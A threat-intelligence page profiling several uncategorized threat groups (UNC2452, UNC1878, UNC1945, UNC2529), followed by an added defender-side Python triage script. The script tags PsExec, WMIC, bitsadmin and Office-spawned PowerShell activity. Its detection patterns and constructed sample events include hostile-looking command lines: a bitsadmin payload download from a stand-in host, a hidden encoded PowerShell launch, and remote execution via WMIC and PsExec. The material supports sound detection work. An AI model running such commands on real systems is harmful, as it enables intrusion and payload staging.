An uncategorized (UNC) threat group is a cluster of cyber intrusion activity that includes observable artifacts such as adversary infrastructure, tools, and attack patterns, but that has not yet been classified as an advanced persistent threat (APT) or financially motivated (FIN) group. As more artifacts and analysis are collected on a UNC group, Mandiant Threat Intelligence may merge its activity set with other UNC groups or, through the graduation process, reclassify it as a temporary (TEMP), APT, or FIN group.

UNC2452 is a sophisticated group that has targeted government and private sector entities worldwide. The group has employed many unique capabilities, including gaining initial access through a software supply chain compromise. After gaining access to a victim network, UNC2452 keeps a light malware footprint, often using legitimate credentials to access data and move laterally. The U.S. government attributed the SolarWinds supply chain compromise, which we track as UNC2452, to the Russian Foreign Intelligence Service (SVR). Mandiant Threat Intelligence assesses that UNC2452 activity aligns broadly with nation-state priorities and that the group's targeting patterns are consistent with Russian strategic interests.

UNC1878 is a financially motivated group that monetizes its intrusions by extorting victims after deploying RYUK ransomware. As of September 2020, Mandiant has increasingly observed KEGTAP campaigns as the initial infection vector for UNC1878 operations; previously, UNC1878 used TrickBot for initial access. UNC1878 has used various offensive security tools, most commonly Cobalt Strike BEACON, along with legitimate tools and built-in commands such as PsExec, WMI, and BITSadmin.

First Seen: September 2020
Source Region: Russia
Targeted Regions: 16
Motivation: Financial Gain
Associated Malware: ANCHOR, BEACON, BLUESPINE, CONTI, and 23 others

UNC1945 is a group that has been observed targeting a number of organizations in the telecommunications, financial, and business services industries since at least early 2018. The goal of UNC1945 is currently unknown because Mandiant has not been able to observe the activities that followed UNC1945 compromises. Based on available information, Mandiant has not been able to assess a general location that the group operates from.

UNC2529 is a well-resourced and experienced group that has targeted multiple organizations across numerous industries in a global phishing campaign. The group has used phishing emails containing inline links to malicious URLs hosting DOUBLEDRAG, a highly obfuscated Excel document that serves as a first-stage downloader. DOUBLEDRAG attempts to download a second-stage obfuscated, memory-only PowerShell dropper, which Mandiant tracks as DOUBLEDROP, that in turn launches a backdoor into memory. This third-stage backdoor is tracked as DOUBLEBACK. UNC2529 showed signs of target research: the sender email addresses and subject lines were tailored to the intended victims. Although Mandiant has no data on the objectives of this threat actor, its broad targeting across industries and geographies is consistent with a targeting calculus most commonly seen among financially motivated groups.
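Two of the profiles above describe behaviour that a defender can look for in endpoint telemetry: UNC1878's use of legitimate and built-in tools (PsExec, WMI, BITSadmin) for lateral movement and staging, and UNC2529's chain in which an Excel document (DOUBLEDRAG) pulls down a memory-only PowerShell dropper (DOUBLEDROP). The following added example, which is not Mandiant's code or a signature for either group, runs a small triage pass over constructed process-creation events and tags both patterns. The event format, hostnames, paths and command lines are all constructed for illustration, and the PowerShell switch heuristic is a generic assumption rather than anything specific to DOUBLEDROP.

```python
"""
Added defender-side example (not Mandiant's code): tag process-creation
events that match the living-off-the-land tooling named in the UNC1878
profile and the Office-to-PowerShell delivery shape of the UNC2529 chain.
All sample telemetry below is constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    user: str
    parent: str   # parent process image path
    image: str    # created process image path
    cmdline: str


# Image-name patterns for the built-in / legitimate tools named on the page.
LOLBIN_IMAGES = {
    "psexec":    re.compile(r"(^|\\)psexec(64)?\.exe$", re.I),
    "wmic":      re.compile(r"(^|\\)wmic\.exe$", re.I),
    "bitsadmin": re.compile(r"(^|\\)bitsadmin\.exe$", re.I),
}
OFFICE_IMAGE = re.compile(r"(^|\\)(excel|winword|powerpnt)\.exe$", re.I)
POWERSHELL_IMAGE = re.compile(r"(^|\\)(powershell|pwsh)\.exe$", re.I)
# Switches and cmdlets typical of a memory-only PowerShell dropper.
# Assumption: a generic heuristic, not a signature for DOUBLEDROP itself.
PS_LOADER_HINTS = re.compile(
    r"-(e|enc|encodedcommand)\b|-nop\b|-w(indowstyle)?\s+hidden|"
    r"downloadstring|frombase64string|\biex\b", re.I)


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'host|user|parent|image|cmdline' record."""
    host, user, parent, image, cmdline = line.split("|", 4)
    return ProcEvent(host, user, parent, image, cmdline)


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection tags that apply to a single event."""
    tags = []
    for name, rx in LOLBIN_IMAGES.items():
        if rx.search(ev.image):
            tags.append(f"lolbin:{name}")
    cmd = ev.cmdline
    if "lolbin:bitsadmin" in tags and re.search(r"/transfer\b.*https?://", cmd, re.I):
        tags.append("bitsadmin_http_download")      # staging a payload over HTTP
    if "lolbin:wmic" in tags and re.search(r"/node:", cmd, re.I):
        tags.append("wmic_remote_execution")        # process creation on another host
    if "lolbin:psexec" in tags and re.search(r"\\\\[\w.-]+", cmd):
        tags.append("psexec_remote_target")         # explicit \\host argument
    if OFFICE_IMAGE.search(ev.parent) and POWERSHELL_IMAGE.search(ev.image):
        tags.append("office_spawned_powershell")    # document-to-PowerShell delivery
        if PS_LOADER_HINTS.search(cmd):
            tags.append("powershell_loader_switches")
    return tags


def triage(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (host, tags) for every event that produced at least one tag."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        tags = classify(ev)
        if tags:
            hits.append((ev.host, tags))
    return hits


# Constructed sample telemetry; hosts, users, paths and URLs are illustrative only.
SAMPLE_EVENTS = [
    r"ws01|corp\alice|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe",
    r"ws02|corp\bob|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|"
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell.exe -nop -w hidden -enc SQBFAFgA",
    r"srv01|corp\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\bitsadmin.exe|"
    r"bitsadmin /transfer job1 http://stage.example.invalid/a.bin C:\Users\Public\a.bin",
    r"srv01|corp\svc_backup|C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|"
    r'wmic /node:srv02 process call create "cmd /c hostname"',
    r"srv01|corp\svc_backup|C:\Windows\System32\cmd.exe|C:\Tools\PsExec64.exe|"
    r"PsExec64.exe \\srv03 -s cmd.exe",
]

if __name__ == "__main__":
    for host, tags in triage(SAMPLE_EVENTS):
        print(host, ", ".join(tags))
```

The tags are deliberately layered: a bare `lolbin:*` tag on its own is common in administrative use and is only a weak signal, whereas the qualifying tags (remote target, HTTP download, Office parent plus loader-style switches) are what an analyst would actually alert on, ideally correlated across hosts by the same account in a short window.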